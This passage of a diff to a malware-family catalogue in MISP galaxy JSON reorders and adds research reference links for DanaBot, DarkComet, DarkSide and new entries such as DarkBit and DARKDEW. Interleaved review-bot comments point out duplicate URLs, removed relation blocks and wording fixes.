+ "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense",
+ "https://research.checkpoint.com/danabot-demands-a-ransom-payment/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.mandiant.com/resources/supply-chain-node-js",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/",
+ "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
"https://asec.ahnlab.com/en/30445/",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://blog.lexfo.fr/danabot-malware.html",
+ "https://security-soup.net/decoding-a-danabot-downloader/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot",
+ "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
+ "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service",
+ "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
"https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
+ "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity",
+ "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
"https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
- "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/",
+ "https://twitter.com/f0wlsec/status/1459892481760411649",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [],
@@ -19409,13 +20628,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot",
- "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/",
- "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf",
"https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf",
"https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/",
+ "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f",
+ "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf",
"https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf",
- "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f"
+ "https://www.youtube.com/watch?v=FttiysUZmDw"
],
"synonyms": [],
"type": []
@@ -19423,29 +20642,60 @@
"uuid": "98d3c6b3-c29f-46ba-b24d-88b135cd3183",
"value": "danbot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit",
+ "https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/",
+ "https://twitter.com/luc4m/status/1626535098039271425",
+ "https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "abf5436b-23e4-4dec-8c98-0e95a499be78",
+ "value": "DarkBit"
+ },
+ {
+ "description": "Stealer is written in Visual Basic.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud",
+ "https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "43601d72-1df5-4d95-8cdc-ad9754aa5d72",
+ "value": "DarkCloud Stealer"
+ },
{
"description": "DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/",
- "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
"https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/",
"https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html",
+ "https://content.fireeye.com/apt/rpt-apt38",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
"https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
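Review bot: the reordered DarkComet refs keep the same Symantec Elfin/APT33 post under two hosts (`https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage` and `https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage`), so the refs list should be deduplicated by canonical URL before it is serialized. Apart from the one real addition (the Bitdefender CVE-2022-47966 advisory), this hunk is pure reordering of unchanged URLs, which suggests the generator writes refs in upstream (insertion or hash) order; sorting refs before writing would keep future regenerations from producing a diff this size for a single new entry. The description context line also spells the author's name two ways ("Lesueur" and "Lesuer"), which is worth fixing at the source it is pulled from rather than here.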
@@ -19455,18 +20705,23 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "15949ecb-1f2b-4f59-9cf7-5751694e8fba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
"value": "DarkComet"
},
+ {
+ "description": "Mandiant associates this with UNC4191, this malware spreads to removable drives.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew",
+ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia",
+ "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "16d9f98d-4da6-419d-89f7-8c30418255ae",
+ "value": "DARKDEW"
+ },
{
"description": "",
"meta": {
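Review bot: the `related` block on DarkComet pointing at `15949ecb-1f2b-4f59-9cf7-5751694e8fba` (type `similar`, tagged almost-certain) is removed with nothing replacing it, and the same removal recurs below for DarkPulsar (`7e9f46aa-d5d1-11e8-b782-e71d52d8ac7c`) and DarkRat (`c9e6e42a-65c0-418e-ab77-09bcdb1214a3`). If the regeneration no longer carries these cross-galaxy relations, that is data loss and should either be restored from the previous revision or called out explicitly in the commit message; if dropping them is intentional, say why. Separately, the new DARKDEW description is a comma splice ("Mandiant associates this with UNC4191, this malware spreads to removable drives."); suggest "Mandiant associates this malware with UNC4191; it spreads via removable drives."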
@@ -19524,8 +20779,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi",
- "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html",
- "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html"
+ "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html",
+ "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html"
],
"synonyms": [],
"type": []
@@ -19538,8 +20793,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon",
- "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
"https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml",
+ "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html"
],
"synonyms": [
@@ -19550,6 +20805,19 @@
"uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2",
"value": "Darkmoon"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink",
+ "https://www.group-ib.com/media-center/press-releases/dark-pink-apt/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f3522624-a704-4d74-8c21-1c863ab6d5eb",
+ "value": "DarkPink"
+ },
{
"description": "",
"meta": {
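Review bot: the new DarkPink cluster ships with an empty `description` while its only non-Malpedia ref is a Group-IB press release about the Dark Pink APT group, so nothing in the entry tells a user whether `DarkPink` names the malware family or the actor of the same name. One sentence stating that this cluster is the malware tracked by Malpedia as `win.darkpink`, and that the actor is a separate entity, would prevent mis-tagging; leaving `description` empty for a value that reads like a threat-actor name is the worst option.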
@@ -19560,15 +20828,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7e9f46aa-d5d1-11e8-b782-e71d52d8ac7c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0",
"value": "DarkPulsar"
},
@@ -19583,15 +20842,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c9e6e42a-65c0-418e-ab77-09bcdb1214a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bcff979f-2b4b-41cc-86c9-fe1ea3adce6e",
"value": "DarkRat"
},
@@ -19614,129 +20864,130 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside",
- "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
- "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
- "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/",
- "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
- "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
- "https://www.secjuice.com/blue-team-detection-darkside-ransomware/",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/",
- "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
- "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
- "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html",
- "https://brandefense.io/darkside-ransomware-analysis-report/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
"https://www.varonis.com/blog/darkside-ransomware/",
- "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
- "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/",
- "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
- "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions",
"https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/",
- "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/",
- "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
- "https://zawadidone.nl/darkside-ransomware-analysis/",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/",
- "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/",
- "https://www.acronis.com/en-us/articles/darkside-ransomware/",
- "https://unit42.paloaltonetworks.com/darkside-ransomware/",
- "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
- "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
"https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
- "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://community.riskiq.com/article/fdf74f23",
- "https://twitter.com/sysopfb/status/1422280887274639375",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware",
- "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/",
- "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
- "https://blog.group-ib.com/blackmatter2",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.secjuice.com/blue-team-detection-darkside-ransomware/",
"https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/",
- "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html",
- "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
- "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/",
+ "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/",
+ "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
+ "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://unit42.paloaltonetworks.com/darkside-ransomware/",
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.glimps.fr/lockbit3-0/",
- "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
"https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/",
+ "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf",
+ "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
+ "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/",
+ "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/",
+ "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf",
+ "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://zawadidone.nl/darkside-ransomware-analysis/",
+ "https://asec.ahnlab.com/en/34549/",
+ "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html",
+ "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.acronis.com/en-us/articles/darkside-ransomware/",
+ "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
+ "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968",
+ "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://twitter.com/ValthekOn/status/1422385890467491841?s=20",
+ "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#",
+ "https://brandefense.io/darkside-ransomware-analysis-report/",
+ "https://twitter.com/sysopfb/status/1422280887274639375",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
+ "https://community.riskiq.com/article/fdf74f23",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/",
+ "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6",
"https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
"https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/",
- "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html",
- "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/",
- "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf",
- "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
- "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968",
- "https://asec.ahnlab.com/en/34549/",
- "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
+ "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
+ "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
"https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside",
- "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
- "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/",
- "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
- "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
- "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6",
- "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
- "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
- "https://twitter.com/ValthekOn/status/1422385890467491841?s=20",
+ "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
